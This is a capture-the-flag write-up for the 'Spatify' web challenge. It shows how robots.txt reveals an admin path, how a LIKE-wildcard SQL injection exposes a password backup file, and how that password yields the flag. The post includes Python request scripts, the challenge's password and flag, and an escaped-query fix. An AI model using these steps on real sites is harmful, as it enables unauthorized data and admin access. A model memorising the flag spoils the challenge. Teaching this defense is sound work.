# Spatify

## Difficulty

Easy

## Points

150

## Description

Welcome to spatify, the perfect place to enjoy some royalty-free music with neither ads nor vulnerabilities at all!

## Quick Analysis

### Spatify robots.txt file discovery

Running the **Burpsuite** crawler (any crawler would do) discovered a `/robots.txt` file.

### What is a robots.txt file used for? [\[1\]](https://developers.google.com/search/docs/crawling-indexing/robots/intro)

The `robots.txt` file tells search engine crawlers which URLs the crawler can access on your site.

### Content of robots.txt

```python
from requests import get, post

# Base URL of the challenge instance; reused by the later snippets.
url = 'https://blackhat4-944f71937411184fb04dddb0c9371eb1-0.chals.bh.ctf.sa'

file = '/robots.txt'
response = get(url + file)
print(response.text)
```

```
User-agent: *
Disallow: /superhiddenadminpanel/
```

### Spatify's admin panel

The Spatify admin panel `/superhiddenadminpanel/` can only be accessed with a password.

### Spatify search engine

The Spatify home page `/` searches for music by name.\
Default listed music:

```html
<div class="mb-2"><b>[FEATURED] Goldn - Praz Khanal</b></div>
<div class="player mx-auto w-100 mb-4">
    <audio>
        <source src="/static/audio/goldn.mp3" type="audio/mpeg">
    </audio>
</div>

<div class="mb-2"><b>[FEATURED] Guitar Electro Sport Trailer - Gvidon</b></div>
<div class="player mx-auto w-100 mb-4">
    <audio>
        <source src="/static/audio/guitar.mp3" type="audio/mpeg">
    </audio>
</div>

<div class="mb-2"><b>[FEATURED] Learn SQL in 3 minutes</b></div>
<div class="player mx-auto w-100 mb-4">
    <audio>
        <source src="/static/audio/learn_sql.mp3" type="audio/mpeg">
    </audio>
</div>
```

#### Analyze the search SQL Query

The search requires an input of at least five characters.\
The word common to all three music names is `FEATURED`, and searching for `FEATURED` returns the same music as the home page default listing.\
I assume the SQL query is based on the `LIKE` operator.

### The SQL LIKE Operator [\[2\]](https://www.w3schools.com/sql/sql_like.asp)

The LIKE operator is used in a WHERE clause to search for a specified pattern in a column.

There are two wildcards often used in conjunction with the LIKE operator:

* The percent sign (%) represents zero, one, or multiple characters
* The underscore sign (\_) represents one, single character

#### LIKE syntax

```
SELECT column1, column2, ...
FROM table_name
WHERE columnN LIKE pattern; 
```

#### Spatify Search with SQL Wildcards

The result of a `FEATURE%` search is the same as the home page default music, which means the search term is interpreted as a `LIKE` pattern and the query is injectable with `SQL wildcards`.
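To show why a `LIKE` search behaves this way, and how a developer closes it, here is an added example (not part of the original writeup and not the challenge's code) that runs the same search against an in-memory SQLite table. The catalogue names are constructed to mirror the listing above; the point is that parameterised queries alone do not stop wildcard injection, the `%` and `_` in user input must also be escaped.

```python
import sqlite3

# Constructed sample catalogue; the last row stands in for a record the
# default listing never shows.
TRACKS = [
    "[FEATURED] Goldn - Praz Khanal",
    "[FEATURED] Guitar Electro Sport Trailer - Gvidon",
    "[FEATURED] Learn SQL in 3 minutes",
    "hidden backup record",
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE music (name TEXT)")
    conn.executemany("INSERT INTO music VALUES (?)", [(t,) for t in TRACKS])
    return conn


def search_unescaped(conn, term):
    # Parameterised, so there is no classic SQL injection, but the user's
    # % and _ still act as LIKE wildcards: a term of only % matches every row.
    rows = conn.execute("SELECT name FROM music WHERE name LIKE ?", (f"%{term}%",))
    return [r[0] for r in rows]


def escape_like(term, esc="\\"):
    # Escape the escape character first, then the two LIKE metacharacters,
    # so the user's text is matched literally.
    return (term.replace(esc, esc + esc)
                .replace("%", esc + "%")
                .replace("_", esc + "_"))


def search_escaped(conn, term):
    # ESCAPE names the character that neutralises % and _ inside the pattern;
    # only the wrapping % added by the application remain wildcards.
    rows = conn.execute(
        "SELECT name FROM music WHERE name LIKE ? ESCAPE '\\'",
        (f"%{escape_like(term)}%",),
    )
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = make_db()
    print(search_unescaped(db, "%%%%%%"))  # every row, including the hidden one
    print(search_escaped(db, "%%%%%%"))    # nothing: no name contains a literal %
```

A minimum-length check on the search term, as the challenge has, does not help, since `%%%%%%` satisfies it.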

## Exploitation

### SQL wildcard injection

List all music records by searching for a term made only of `%` wildcards (the search needs at least five characters): `q=%%%%%%`

```html
<div class="mb-2"><b>😋 🅟🅐🅢🅢🅦🅞🅡🅓 🅑🅐🅒🅚🅤🅟 😋</b></div>
<div class="player mx-auto w-100 mb-4">
    <audio>
        <source src="/static/audio/secret_password_backup.txt.bak" type="audio/mpeg">
    </audio>
</div>

<div class="mb-2"><b>[FEATURED] Goldn - Praz Khanal</b></div>
<div class="player mx-auto w-100 mb-4">
    <audio>
        <source src="/static/audio/goldn.mp3" type="audio/mpeg">
    </audio>
</div>

<div class="mb-2"><b>[FEATURED] Guitar Electro Sport Trailer - Gvidon</b></div>
<div class="player mx-auto w-100 mb-4">
    <audio>
        <source src="/static/audio/guitar.mp3" type="audio/mpeg">
    </audio>
</div>

<div class="mb-2"><b>[FEATURED] Learn SQL in 3 minutes</b></div>
<div class="player mx-auto w-100 mb-4">
    <audio>
        <source src="/static/audio/learn_sql.mp3" type="audio/mpeg">
    </audio>
</div>
```

### Content of `secret_password_backup.txt.bak`

```python
# Reuses `url` and `get` from the earlier snippet.
file = '/static/audio/secret_password_backup.txt.bak'
response = get(url + file)
print(response.text)
```

```
THISISTHEPASSWORDTOTHEADMINPANEL123321123321
```

### The flag

```python
import re

# Reuses `url` and `post` from the earlier snippet.
endpoint = '/superhiddenadminpanel/'
data = { 'password': 'THISISTHEPASSWORDTOTHEADMINPANEL123321123321' }
response = post(url + endpoint, data = data)
html = response.text
# group(0) is the whole match, i.e. the full BlackHatMEA{...} flag.
flag = re.search('BlackHatMEA{(.*)}', html)
print(flag.group(0) if flag else 'flag not found in response')
```

```
BlackHatMEA{551:14:dc339129777027c07c8c63bd0310f7da6d9074a6}
```

## References

* <https://developers.google.com/search/docs/crawling-indexing/robots/intro>
* <https://www.w3schools.com/sql/sql_like.asp>
